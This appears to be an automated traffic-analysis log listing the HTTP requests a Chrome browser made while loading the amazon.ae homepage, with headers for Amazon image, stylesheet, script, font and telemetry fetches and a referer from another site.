    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://7czh8.crimiti.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/BTS24_AE_GW_SWM_ADIB_400x39_EN._CB567042873_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41-WpIOxHtL._RC%7C71S7yoZEbpL.css,51u4GJlQjiL.css,118zqOsmV-L.css,31-P1-9TebL.css,31YZpDCYJPL.css,21pkK7OQMnL.css,41Xj8tZc2XL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11EKggV-DlL.css,415g7iDx4VL.css,11qTzxZ0Y5L.css_.css?AUIClients/NavDesktopUberAsset&JoiNCr6G HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.html HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61cg-CaC1GL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924072_186x116_1X_en_AE._SY116_CB566513340_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/BTS24_AE_GW_SWM_ADIB_400x39_EN._CB567042873_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 4.85sec-ch-dpr: 1ect: 4gsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264920835
    Source: global trafficHTTP traffic detected: GET /images/S/sash/Z8YwjOjqIHxqujG.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Sports_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/ydDD9hnRfziI$y7.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314PAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/ad-feedback/info_icon_1Xsprite.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/-NcRiM84u1IwoUa.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314PAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41IU10DZeDL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Tools_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Outdoor_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924076_186x116_1X_en_AE._SY116_CB566513340_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924077_186x116_1X_en_AE._SY116_CB566504241_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924078_186x116_1X_en_AE._SY116_CB566504241_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/pDxWAF1pBB0dzGB.woff2 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314PAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DAPAVCQJMFK78QJEV1PMZ:0 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED
